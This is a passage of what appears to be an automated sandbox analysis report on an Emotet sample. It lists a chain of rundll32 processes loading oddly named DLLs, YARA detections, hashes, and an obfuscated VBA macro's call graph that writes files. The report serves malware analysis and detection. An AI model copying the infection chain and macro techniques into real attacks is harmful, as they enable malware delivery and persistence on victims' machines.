gBJACcAKQApAA==
                                        Imagebase:0x13f3c0000
                                        File size:473600 bytes
                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092804988.00000000001B6000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2092937441.0000000001B86000.00000004.00000001.sdmp, Author: Florian Roth
                                        Reputation:high

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 1616 Parent PID: 2544

                                        General

                                        Start time:18:35:43
                                        Start date:07/01/2021
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                                        Imagebase:0xffa00000
                                        File size:45568 bytes
                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2892 Parent PID: 1616

                                        General

                                        Start time:18:35:43
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095079967.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2808 Parent PID: 2892

                                        General

                                        Start time:18:35:44
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096635547.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2096612439.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2884 Parent PID: 2808

                                        General

                                        Start time:18:35:45
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2097844811.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2098980384.00000000007A1000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 960 Parent PID: 2884

                                        General

                                        Start time:18:35:45
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099512002.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2099552528.0000000000251000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2440 Parent PID: 960

                                        General

                                        Start time:18:35:46
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2100964002.00000000002D1000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2100913831.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2352 Parent PID: 2440

                                        General

                                        Start time:18:35:47
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2101819334.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2800 Parent PID: 2352

                                        General

                                        Start time:18:35:47
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103080686.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 3004 Parent PID: 2800

                                        General

                                        Start time:18:35:48
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2104205195.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2952 Parent PID: 3004

                                        General

                                        Start time:18:35:48
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2105544671.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2252 Parent PID: 2952

                                        General

                                        Start time:18:35:49
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2106608092.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 1604 Parent PID: 2252

                                        General

                                        Start time:18:35:49
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2110533046.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2204 Parent PID: 1604

                                        General

                                        Start time:18:35:50
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110963948.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Analysis Process: rundll32.exe PID: 2536 Parent PID: 2204

                                        General

                                        Start time:18:35:51
                                        Start date:07/01/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
                                        Imagebase:0xa70000
                                        File size:44544 bytes
                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2341899738.00000000006F1000.00000020.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2341761700.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security

                                        Chronological Activities

                                        Disassembly

                                        Code Analysis

                                        VBA Code

                                        Call Graph

                                        Graph

                                        Module: A81c_pcot0t3c8

                                        Declaration
                                        LineContent
                                        1

                                        Attribute VB_Name = "A81c_pcot0t3c8"

                                        Executed Functions
                                        Function Rvpv59xrvp7m2wb, APIs: 624, Strings: 66, Number of lines: 195, Relevance: 1394.195
                                        APIsMeta Information

                                        Xj1p0_yor4q8g

                                        Item

                                        Gdmbhv991jtvgzq

                                        hlEyDCTAH

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        eHrGyvyM

                                        Close

                                        cVkLD

                                        tIaWTAJA

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        PvcTcFOF

                                        Close

                                        chutdOAFs

                                        XhUYUbSBA

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        pzqeBGIAH

                                        Close

                                        TbHJC

                                        eBvGf

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        bYwGEijH

                                        Close

                                        uvgvJGfI

                                        Mid

                                        Name

                                        Application

                                        rINmB

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

